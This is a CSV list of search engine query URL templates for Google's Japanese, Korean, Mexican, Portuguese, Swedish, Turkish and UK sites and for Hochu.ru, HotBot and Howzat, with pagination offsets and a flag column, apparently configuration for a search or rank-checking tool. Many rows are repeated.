"International","Google JP 4 (Next 10)","http://search.goo.ne.jp/web.jsp?MT={SEARCH_KEYWORD}&SM=MC&DC=10&DE=2&FR=30&WTS=ntt&CK=1","0"
"International","Google JP 4 (Next 10)","http://search.goo.ne.jp/web.jsp?MT={SEARCH_KEYWORD}&SM=MC&DC=10&DE=2&FR=30&WTS=ntt&CK=1","0"
"International","Google JP 4 (Next 100)","http://www.google.co.jp/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=300&sa=N","0"
"International","Google JP 4 (Next 100)","http://www.google.co.jp/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=300&sa=N","0"
"International","Google JP 4 (Next 100)","http://www.google.co.jp/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=300&sa=N","0"
"International","Google JP 5 (Next 10)","http://search.goo.ne.jp/web.jsp?MT={SEARCH_KEYWORD}&SM=MC&DC=10&DE=2&FR=40&WTS=ntt&CK=1","0"
"International","Google JP 5 (Next 10)","http://search.goo.ne.jp/web.jsp?MT={SEARCH_KEYWORD}&SM=MC&DC=10&DE=2&FR=40&WTS=ntt&CK=1","0"
"International","Google JP 5 (Next 10)","http://search.goo.ne.jp/web.jsp?MT={SEARCH_KEYWORD}&SM=MC&DC=10&DE=2&FR=40&WTS=ntt&CK=1","0"
"International","Google JP 5 (Next 100)","http://www.google.co.jp/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=400&sa=N","0"
"International","Google JP 5 (Next 100)","http://www.google.co.jp/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=400&sa=N","0"
"International","Google JP 5 (Next 100)","http://www.google.co.jp/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=400&sa=N","0"
"International","Google KR","http://www.google.co.kr/search?q={SEARCH_KEYWORD}&num=100&hl=ko&lr=lang_ko&ie=UTF-8&inlang=ko&newwindow=1&start=0&sa=N","1"
"International","Google KR","http://www.google.co.kr/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=0&sa=N","0"
"International","Google KR","http://www.google.co.kr/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=0&sa=N","0"
"International","Google KR","http://www.google.co.kr/search?q={SEARCH_KEYWORD}&num=100&hl=ko&lr=lang_ko&ie=UTF-8&inlang=ko&newwindow=1&start=0&sa=N","0"
"International","Google KR","http://www.google.co.kr/search?q={SEARCH_KEYWORD}&num=100&hl=ko&lr=lang_ko&ie=UTF-8&inlang=ko&newwindow=1&start=0&sa=N","0"
"International","Google KR","http://www.google.co.kr/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=0&sa=N","0"
"International","Google KR 2 (Next 100)","http://www.google.co.kr/search?q={SEARCH_KEYWORD}&num=100&hl=ko&lr=lang_ko&ie=UTF-8&inlang=ko&newwindow=1&start=100&sa=N","1"
"International","Google KR 2 (Next 100)","http://www.google.co.kr/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=100&sa=N","0"
"International","Google KR 2 (Next 100)","http://www.google.co.kr/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=100&sa=N","0"
"International","Google KR 2 (Next 100)","http://www.google.co.kr/search?q={SEARCH_KEYWORD}&num=100&hl=ko&lr=lang_ko&ie=UTF-8&inlang=ko&newwindow=1&start=100&sa=N","0"
"International","Google KR 2 (Next 100)","http://www.google.co.kr/search?q={SEARCH_KEYWORD}&num=100&hl=ko&lr=lang_ko&ie=UTF-8&inlang=ko&newwindow=1&start=100&sa=N","0"
"International","Google KR 2 (Next 100)","http://www.google.co.kr/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=100&sa=N","0"
"International","Google KR 3 (Next 100)","http://www.google.co.kr/search?q={SEARCH_KEYWORD}&num=100&hl=ko&lr=lang_ko&ie=UTF-8&inlang=ko&newwindow=1&start=200&sa=N","1"
"International","Google KR 3 (Next 100)","http://www.google.co.kr/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=200&sa=N","0"
"International","Google KR 3 (Next 100)","http://www.google.co.kr/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=200&sa=N","0"
"International","Google KR 3 (Next 100)","http://www.google.co.kr/search?q={SEARCH_KEYWORD}&num=100&hl=ko&lr=lang_ko&ie=UTF-8&inlang=ko&newwindow=1&start=200&sa=N","0"
"International","Google KR 3 (Next 100)","http://www.google.co.kr/search?q={SEARCH_KEYWORD}&num=100&hl=ko&lr=lang_ko&ie=UTF-8&inlang=ko&newwindow=1&start=200&sa=N","0"
"International","Google KR 3 (Next 100)","http://www.google.co.kr/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=200&sa=N","0"
"International","Google KR 4 (Next 100)","http://www.google.co.kr/search?q={SEARCH_KEYWORD}&num=100&hl=ko&lr=lang_ko&ie=UTF-8&inlang=ko&newwindow=1&start=300&sa=N","1"
"International","Google KR 4 (Next 100)","http://www.google.co.kr/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=300&sa=N","0"
"International","Google KR 4 (Next 100)","http://www.google.co.kr/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=300&sa=N","0"
"International","Google KR 4 (Next 100)","http://www.google.co.kr/search?q={SEARCH_KEYWORD}&num=100&hl=ko&lr=lang_ko&ie=UTF-8&inlang=ko&newwindow=1&start=300&sa=N","0"
"International","Google KR 4 (Next 100)","http://www.google.co.kr/search?q={SEARCH_KEYWORD}&num=100&hl=ko&lr=lang_ko&ie=UTF-8&inlang=ko&newwindow=1&start=300&sa=N","0"
"International","Google KR 4 (Next 100)","http://www.google.co.kr/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=300&sa=N","0"
"International","Google KR 5 (Next 100)","http://www.google.co.kr/search?q={SEARCH_KEYWORD}&num=100&hl=ko&lr=lang_ko&ie=UTF-8&inlang=ko&newwindow=1&start=400&sa=N","1"
"International","Google KR 5 (Next 100)","http://www.google.co.kr/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=400&sa=N","0"
"International","Google KR 5 (Next 100)","http://www.google.co.kr/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=400&sa=N","0"
"International","Google KR 5 (Next 100)","http://www.google.co.kr/search?q={SEARCH_KEYWORD}&num=100&hl=ko&lr=lang_ko&ie=UTF-8&inlang=ko&newwindow=1&start=400&sa=N","0"
"International","Google KR 5 (Next 100)","http://www.google.co.kr/search?q={SEARCH_KEYWORD}&num=100&hl=ko&lr=lang_ko&ie=UTF-8&inlang=ko&newwindow=1&start=400&sa=N","0"
"International","Google KR 5 (Next 100)","http://www.google.co.kr/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=400&sa=N","0"
"International","Google MX","http://www.google.com.mx/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=0&sa=N","1"
"International","Google MX","http://www.google.com.mx/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=0&sa=N","0"
"International","Google MX","http://www.google.com.mx/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=0&sa=N","0"
"International","Google MX 2 (Next 100)","http://www.google.com.mx/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=100&sa=N","1"
"International","Google MX 2 (Next 100)","http://www.google.com.mx/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=100&sa=N","0"
"International","Google MX 2 (Next 100)","http://www.google.com.mx/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=100&sa=N","0"
"International","Google MX 3 (Next 100)","http://www.google.com.mx/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=200&sa=N","1"
"International","Google MX 3 (Next 100)","http://www.google.com.mx/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=200&sa=N","0"
"International","Google MX 3 (Next 100)","http://www.google.com.mx/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=200&sa=N","0"
"International","Google MX 4 (Next 100)","http://www.google.com.mx/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=300&sa=N","0"
"International","Google MX 4 (Next 100)","http://www.google.com.mx/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=300&sa=N","0"
"International","Google MX 4 (Next 100)","http://www.google.com.mx/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=300&sa=N","0"
"International","Google MX 5 (Next 100)","http://www.google.com.mx/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=400&sa=N","1"
"International","Google MX 5 (Next 100)","http://www.google.com.mx/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=400&sa=N","0"
"International","Google MX 5 (Next 100)","http://www.google.com.mx/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=400&sa=N","0"
"International","Google PT","http://www.google.com/search?num=100&hl=ptl&q={SEARCH_KEYWORD}&btnG=Pesquisa+Google&lr=lang_pt","0"
"International","Google PT","http://www.google.pt/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=0&sa=N","0"
"International","Google PT","http://www.google.pt/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=0&sa=N","0"
"International","Google PT","http://www.google.com/search?num=100&hl=ptl&q={SEARCH_KEYWORD}&btnG=Pesquisa+Google&lr=lang_pt","0"
"International","Google PT","http://www.google.com/search?num=100&hl=ptl&q={SEARCH_KEYWORD}&btnG=Pesquisa+Google&lr=lang_pt","0"
"International","Google PT","http://www.google.pt/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=0&sa=N","0"
"International","Google PT 2 (Next 100)","http://www.google.com/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=lang_pt&ie=UTF-8&start=100&sa=N","0"
"International","Google PT 2 (Next 100)","http://www.google.pt/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=100&sa=N","0"
"International","Google PT 2 (Next 100)","http://www.google.pt/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=100&sa=N","0"
"International","Google PT 2 (Next 100)","http://www.google.com/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=lang_pt&ie=UTF-8&start=100&sa=N","0"
"International","Google PT 2 (Next 100)","http://www.google.com/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=lang_pt&ie=UTF-8&start=100&sa=N","0"
"International","Google PT 2 (Next 100)","http://www.google.pt/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=100&sa=N","0"
"International","Google PT 3 (Next 100)","http://www.google.com/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=lang_pt&ie=UTF-8&start=200&sa=N","0"
"International","Google PT 3 (Next 100)","http://www.google.pt/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=200&sa=N","0"
"International","Google PT 3 (Next 100)","http://www.google.pt/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=200&sa=N","0"
"International","Google PT 3 (Next 100)","http://www.google.com/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=lang_pt&ie=UTF-8&start=200&sa=N","0"
"International","Google PT 3 (Next 100)","http://www.google.com/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=lang_pt&ie=UTF-8&start=200&sa=N","0"
"International","Google PT 3 (Next 100)","http://www.google.pt/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=200&sa=N","0"
"International","Google PT 4 (Next 100)","http://www.google.com/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=lang_pt&ie=UTF-8&start=300&sa=N","0"
"International","Google PT 4 (Next 100)","http://www.google.pt/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=300&sa=N","0"
"International","Google PT 4 (Next 100)","http://www.google.pt/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=300&sa=N","0"
"International","Google PT 4 (Next 100)","http://www.google.com/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=lang_pt&ie=UTF-8&start=300&sa=N","0"
"International","Google PT 4 (Next 100)","http://www.google.com/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=lang_pt&ie=UTF-8&start=300&sa=N","0"
"International","Google PT 4 (Next 100)","http://www.google.pt/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=300&sa=N","0"
"International","Google PT 5 (Next 100)","http://www.google.com/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=lang_pt&ie=UTF-8&start=400&sa=N","0"
"International","Google PT 5 (Next 100)","http://www.google.pt/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=400&sa=N","0"
"International","Google PT 5 (Next 100)","http://www.google.pt/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=400&sa=N","0"
"International","Google PT 5 (Next 100)","http://www.google.com/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=lang_pt&ie=UTF-8&start=400&sa=N","0"
"International","Google PT 5 (Next 100)","http://www.google.com/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=lang_pt&ie=UTF-8&start=400&sa=N","0"
"International","Google PT 5 (Next 100)","http://www.google.pt/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=400&sa=N","0"
"International","Google SE","http://www.google.se/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=0&sa=N","1"
"International","Google SE","http://www.google.se/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=0&sa=N","0"
"International","Google SE","http://www.google.se/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=0&sa=N","0"
"International","Google SE 2 (Next 100)","http://www.google.se/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=100&sa=N","1"
"International","Google SE 2 (Next 100)","http://www.google.se/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=100&sa=N","0"
"International","Google SE 2 (Next 100)","http://www.google.se/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=100&sa=N","0"
"International","Google SE 3 (Next 100)","http://www.google.se/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=200&sa=N","1"
"International","Google SE 3 (Next 100)","http://www.google.se/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=200&sa=N","0"
"International","Google SE 3 (Next 100)","http://www.google.se/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=200&sa=N","0"
"International","Google SE 4 (Next 100)","http://www.google.se/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=300&sa=N","1"
"International","Google SE 4 (Next 100)","http://www.google.se/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=300&sa=N","0"
"International","Google SE 4 (Next 100)","http://www.google.se/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=300&sa=N","0"
"International","Google SE 5 (Next 100)","http://www.google.se/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=400&sa=N","1"
"International","Google SE 5 (Next 100)","http://www.google.se/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=400&sa=N","0"
"International","Google SE 5 (Next 100)","http://www.google.se/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=400&sa=N","0"
"International","Google TR","http://www.google.com.tr/search?q={SEARCH_KEYWORD}&num=100&hl=tr&lr=&ie=UTF-8&oe=UTF-8&start=0&sa=N","1"
"International","Google TR","http://www.google.com.tr/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=0&sa=N","0"
"International","Google TR","http://www.google.com.tr/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=0&sa=N","0"
"International","Google TR","http://www.google.com.tr/search?q={SEARCH_KEYWORD}&num=100&hl=tr&lr=&ie=UTF-8&oe=UTF-8&start=0&sa=N","0"
"International","Google TR","http://www.google.com.tr/search?q={SEARCH_KEYWORD}&num=100&hl=tr&lr=&ie=UTF-8&oe=UTF-8&start=0&sa=N","0"
"International","Google TR","http://www.google.com.tr/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=0&sa=N","0"
"International","Google TR 2 (Next 100)","http://www.google.com.tr/search?q={SEARCH_KEYWORD}&num=100&hl=tr&lr=&ie=UTF-8&oe=UTF-8&start=100&sa=N","1"
"International","Google TR 2 (Next 100)","http://www.google.com.tr/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=100&sa=N","0"
"International","Google TR 2 (Next 100)","http://www.google.com.tr/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=100&sa=N","0"
"International","Google TR 2 (Next 100)","http://www.google.com.tr/search?q={SEARCH_KEYWORD}&num=100&hl=tr&lr=&ie=UTF-8&oe=UTF-8&start=100&sa=N","0"
"International","Google TR 2 (Next 100)","http://www.google.com.tr/search?q={SEARCH_KEYWORD}&num=100&hl=tr&lr=&ie=UTF-8&oe=UTF-8&start=100&sa=N","0"
"International","Google TR 2 (Next 100)","http://www.google.com.tr/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=100&sa=N","0"
"International","Google TR 3 (Next 100)","http://www.google.com.tr/search?q={SEARCH_KEYWORD}&num=100&hl=tr&lr=&ie=UTF-8&oe=UTF-8&start=200&sa=N","1"
"International","Google TR 3 (Next 100)","http://www.google.com.tr/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=200&sa=N","0"
"International","Google TR 3 (Next 100)","http://www.google.com.tr/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=200&sa=N","0"
"International","Google TR 3 (Next 100)","http://www.google.com.tr/search?q={SEARCH_KEYWORD}&num=100&hl=tr&lr=&ie=UTF-8&oe=UTF-8&start=200&sa=N","0"
"International","Google TR 3 (Next 100)","http://www.google.com.tr/search?q={SEARCH_KEYWORD}&num=100&hl=tr&lr=&ie=UTF-8&oe=UTF-8&start=200&sa=N","0"
"International","Google TR 3 (Next 100)","http://www.google.com.tr/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=200&sa=N","0"
"International","Google TR 4 (Next 100)","http://www.google.com.tr/search?q={SEARCH_KEYWORD}&num=100&hl=tr&lr=&ie=UTF-8&oe=UTF-8&start=300&sa=N","1"
"International","Google TR 4 (Next 100)","http://www.google.com.tr/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=300&sa=N","0"
"International","Google TR 4 (Next 100)","http://www.google.com.tr/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=300&sa=N","0"
"International","Google TR 4 (Next 100)","http://www.google.com.tr/search?q={SEARCH_KEYWORD}&num=100&hl=tr&lr=&ie=UTF-8&oe=UTF-8&start=300&sa=N","0"
"International","Google TR 4 (Next 100)","http://www.google.com.tr/search?q={SEARCH_KEYWORD}&num=100&hl=tr&lr=&ie=UTF-8&oe=UTF-8&start=300&sa=N","0"
"International","Google TR 4 (Next 100)","http://www.google.com.tr/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=300&sa=N","0"
"International","Google TR 5 (Next 100)","http://www.google.com.tr/search?q={SEARCH_KEYWORD}&num=100&hl=tr&lr=&ie=UTF-8&oe=UTF-8&start=400&sa=N","1"
"International","Google TR 5 (Next 100)","http://www.google.com.tr/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=400&sa=N","0"
"International","Google TR 5 (Next 100)","http://www.google.com.tr/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=400&sa=N","0"
"International","Google TR 5 (Next 100)","http://www.google.com.tr/search?q={SEARCH_KEYWORD}&num=100&hl=tr&lr=&ie=UTF-8&oe=UTF-8&start=400&sa=N","0"
"International","Google TR 5 (Next 100)","http://www.google.com.tr/search?q={SEARCH_KEYWORD}&num=100&hl=tr&lr=&ie=UTF-8&oe=UTF-8&start=400&sa=N","0"
"International","Google TR 5 (Next 100)","http://www.google.com.tr/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=400&sa=N","0"
"International","Google UK","http://www.google.co.uk/search?q={SEARCH_KEYWORD}&hl=en&meta=cr%3DcountryUK%7CcountryGB","1"
"International","Google UK","http://www.google.co.uk/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=0&sa=N","0"
"International","Google UK","http://www.google.co.uk/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=0&sa=N","0"
"International","Google UK","http://www.google.co.uk/search?q={SEARCH_KEYWORD}&hl=en&meta=cr%3DcountryUK%7CcountryGB","0"
"International","Google UK","http://www.google.co.uk/search?q={SEARCH_KEYWORD}&hl=en&meta=cr%3DcountryUK%7CcountryGB","0"
"International","Google UK","http://www.google.co.uk/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=0&sa=N","0"
"International","Google UK 2 (Next 100)","http://www.google.co.uk/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&cr=countryUK|countryGB&ie=UTF-8&start=100&sa=N","1"
"International","Google UK 2 (Next 100)","http://www.google.co.uk/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=100&sa=N","0"
"International","Google UK 2 (Next 100)","http://www.google.co.uk/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=100&sa=N","0"
"International","Google UK 2 (Next 100)","http://www.google.co.uk/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&cr=countryUK|countryGB&ie=UTF-8&start=100&sa=N","0"
"International","Google UK 2 (Next 100)","http://www.google.co.uk/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&cr=countryUK|countryGB&ie=UTF-8&start=100&sa=N","0"
"International","Google UK 2 (Next 100)","http://www.google.co.uk/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=100&sa=N","0"
"International","Google UK 3 (Next 100)","http://www.google.co.uk/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&cr=countryUK|countryGB&ie=UTF-8&start=200&sa=N","1"
"International","Google UK 3 (Next 100)","http://www.google.co.uk/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=200&sa=N","0"
"International","Google UK 3 (Next 100)","http://www.google.co.uk/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=200&sa=N","0"
"International","Google UK 3 (Next 100)","http://www.google.co.uk/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&cr=countryUK|countryGB&ie=UTF-8&start=200&sa=N","0"
"International","Google UK 3 (Next 100)","http://www.google.co.uk/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&cr=countryUK|countryGB&ie=UTF-8&start=200&sa=N","0"
"International","Google UK 3 (Next 100)","http://www.google.co.uk/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=200&sa=N","0"
"International","Google UK 4 (Next 100)","http://www.google.co.uk/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&cr=countryUK|countryGB&ie=UTF-8&start=300&sa=N","1"
"International","Google UK 4 (Next 100)","http://www.google.co.uk/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=300&sa=N","0"
"International","Google UK 4 (Next 100)","http://www.google.co.uk/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=300&sa=N","0"
"International","Google UK 4 (Next 100)","http://www.google.co.uk/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&cr=countryUK|countryGB&ie=UTF-8&start=300&sa=N","0"
"International","Google UK 4 (Next 100)","http://www.google.co.uk/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&cr=countryUK|countryGB&ie=UTF-8&start=300&sa=N","0"
"International","Google UK 4 (Next 100)","http://www.google.co.uk/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=300&sa=N","0"
"International","Google UK 5 (Next 100)","http://www.google.co.uk/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&cr=countryUK|countryGB&ie=UTF-8&start=400&sa=N","1"
"International","Google UK 5 (Next 100)","http://www.google.co.uk/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=400&sa=N","0"
"International","Google UK 5 (Next 100)","http://www.google.co.uk/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=400&sa=N","0"
"International","Google UK 5 (Next 100)","http://www.google.co.uk/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&cr=countryUK|countryGB&ie=UTF-8&start=400&sa=N","0"
"International","Google UK 5 (Next 100)","http://www.google.co.uk/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&cr=countryUK|countryGB&ie=UTF-8&start=400&sa=N","0"
"International","Google UK 5 (Next 100)","http://www.google.co.uk/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=400&sa=N","0"
"International","Hochu.ru","http://www.hochu.ru/cgi-hochu/search.cgi?TS={SEARCH_KEYWORD}&ZE=1&HS=10&FT=full&CR=&RK=1&RE=All&ST=&AD=","0"
"International","Hochu.ru","http://www.hochu.ru/cgi-hochu/search.cgi?TS={SEARCH_KEYWORD}&ZE=1&HS=10&FT=full&CR=&RK=1&RE=All&ST=&AD=","0"
"International","Hochu.ru","http://www.hochu.ru/cgi-hochu/search.cgi?TS={SEARCH_KEYWORD}&ZE=1&HS=10&FT=full&CR=&RK=1&RE=All&ST=&AD=","0"
"International","Hochu.ru","http://www.hochu.ru/cgi-hochu/search.cgi?TS={SEARCH_KEYWORD}&ZE=1&HS=10&FT=full&CR=&RK=1&RE=All&ST=&AD=","0"
"International","Hochu.ru","http://www.hochu.ru/cgi-hochu/search.cgi?TS={SEARCH_KEYWORD}&ZE=1&HS=10&FT=full&CR=&RK=1&RE=All&ST=&AD=","0"
"International","Hochu.ru","http://www.hochu.ru/cgi-hochu/search.cgi?TS={SEARCH_KEYWORD}&ZE=1&HS=10&FT=full&CR=&RK=1&RE=All&ST=&AD=","0"
"International","HotBot","http://hotbot.lycos.com/?query={SEARCH_KEYWORD}&nummod=2&placeselection=RG&dateoption=within&act.query=1&cobrand=","0"
"International","HotBot","http://www.hotbot.com/default.asp?query={SEARCH_KEYWORD}&ps=&loc=searchbox&tab=web&provKey=Ask+Jeeves","0"
"International","HotBot","http://www.hotbot.com/default.asp?query={SEARCH_KEYWORD}&ps=&loc=searchbox&tab=web&provKey=Ask+Jeeves","0"
"International","HotBot","http://hotbot.lycos.com/?query={SEARCH_KEYWORD}&nummod=2&placeselection=RG&dateoption=within&act.query=1&cobrand=","0"
"International","HotBot","http://hotbot.lycos.com/?query={SEARCH_KEYWORD}&nummod=2&placeselection=RG&dateoption=within&act.query=1&cobrand=","0"
"International","HotBot","http://www.hotbot.com/default.asp?query={SEARCH_KEYWORD}&ps=&loc=searchbox&tab=web&provKey=Ask+Jeeves","0"
"International","Howzat AU","http://www.howzat.com.au/cgi-bin/howzat?restrict=;exclude=;config=htdig;method=and;words=internet%20marketing;page=1","1"
"International","Howzat AU","http://www.howzat.com.au/cgi-bin/howzat?restrict=;exclude=;config=htdig;method=and;words={SEARCH_KEYWORD};page=1","0"
"International","Howzat AU","http://www.howzat.com.au/cgi-bin/howzat?restrict=;exclude=;config=htdig;method=and;words={SEARCH_KEYWORD};page=1","0"
"International","Howzat AU","http://www.howzat.com.au/cgi-bin/howzat?restrict=;exclude=;config=htdig;method=and;words=internet%20marketing;page=1","0"
"International","Howzat AU","http://www.howzat.com.au/cgi-bin/howzat?restrict=;exclude=;config=htdig;method=and;words=internet%20marketing;page=1","0"
"International","Howzat AU","http://www.howzat.com.au/cgi-bin/howzat?restrict=;exclude=;config=htdig;method=and;words={SEARCH_KEYWORD};page=1","0"
"International","Howzat Au 1 (Next 10)","http://www.howzat.com.au/cgi-bin/howzat?restrict=;exclude=;config=htdig;method=and;words={SEARCH_KEYWORD};page=2","1"
"International","Howzat Au 1 (Next 10)","http://www.howzat.com.au/cgi-bin/howzat?restrict=;exclude=;config=htdig;method=and;words={SEARCH_KEYWORD};page=2","0"
"International","Howzat Au 1 (Next 10)","http://www.howzat.com.au/cgi-bin/howzat?restrict=;exclude=;config=htdig;method=and;words={SEARCH_KEYWORD};page=2","0"
"International","Howzat Au 10 (Next 10)","http://www.howzat.com.au/cgi-bin/howzat?restrict=;exclude=;config=htdig;method=and;words={SEARCH_KEYWORD};page=10","1"
